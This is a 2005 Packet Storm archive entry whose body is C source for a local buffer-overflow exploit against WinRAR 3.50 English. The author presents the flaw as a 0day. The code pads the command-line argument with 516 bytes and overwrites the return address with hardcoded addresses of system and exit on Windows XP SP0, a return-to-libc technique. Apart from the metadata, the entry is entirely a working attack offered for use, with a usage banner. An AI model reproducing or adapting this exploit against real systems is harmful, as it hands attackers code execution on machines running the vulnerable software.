winrar-3.50-eng.txt

2005-10-18T00:00:00
ID PACKETSTORM:40784
Type packetstorm
Reporter edward11
Modified 2005-10-18T00:00:00

Description

                                        
                                            `/*  
  
local exploit for winrar <= 3.50 ENG version  
  
  
bug is 0day :)  
  
i'm used ret-2-func technique.  
  
*/  
  
#include <stdio.h>  
#include <string.h>  
#include <windows.h>  
  
int main ( int argc, char *argv[] )  
{  
long sys_addr = 0x77C18044; // winxp sp0 targets...  
long exit_addr = 0x77C27ADC;  
long cmd_addr = 0x77C01335;  
  
char buf[3000];  
char cmd[3000];  
  
if ( argc < 2 )  
{  
printf("\n * 0xLeTzDanCe - WinRAR <= 3.50 local exploit ENG version *\n * * usage: 0xletzdance.exe <path_to_RAR>\n\n");  
exit(0);  
}  
  
memset(buf, 0x00, 3000);  
memset(cmd, 0x00, 3000);  
  
memset(buf, 0x55, 516);  
  
*(long*)&buf[strlen(buf)] = sys_addr;  
*(long *)&buf[strlen(buf)] = exit_addr;  
*(long *)&buf[strlen(buf)] = cmd_addr;  
  
sprintf(cmd, "%s %s", argv[1], buf);  
system(cmd);  
  
}  
`